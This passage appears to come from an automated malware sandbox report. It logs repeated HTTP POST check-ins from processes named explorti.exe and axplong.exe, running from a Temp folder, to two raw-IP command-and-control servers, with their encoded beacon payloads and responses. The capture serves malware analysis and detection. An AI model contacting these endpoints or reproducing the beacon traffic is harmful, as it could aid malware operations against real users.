Jul 26, 2024 20:10:40.686937094 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:40.989072084 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	64122	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:40.074698925 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:40.944853067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:40.946722984 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:41.214973927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	64124	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:41.122009039 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:42.799154043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:42.799990892 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:42.800862074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:42.802792072 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:43.068563938 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	64125	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:41.324702978 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:42.799757004 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:42.800832033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:42.801004887 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:42.808197975 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:43.066204071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	64130	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:43.218396902 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:43.979398012 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:43.979929924 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:44.231873989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	64131	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:43.220967054 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:43.973229885 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:43.979383945 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:44.231636047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	64135	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:44.351320982 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:45.111831903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:45.112617016 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:45.368290901 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	64136	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:44.351653099 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:45.111351013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:45.112093925 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:45.367347956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	64142	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:45.533936977 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:46.285435915 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:46.286205053 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:46.532394886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	64143	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:45.535856009 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:46.310288906 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:46.319298029 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:46.592559099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	64144	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:47.002124071 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:47.810229063 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:47.810995102 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:48.060672998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	64145	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:47.002152920 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:47.793900013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:47.799305916 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:48.044069052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	64146	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:48.157232046 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:48.934905052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
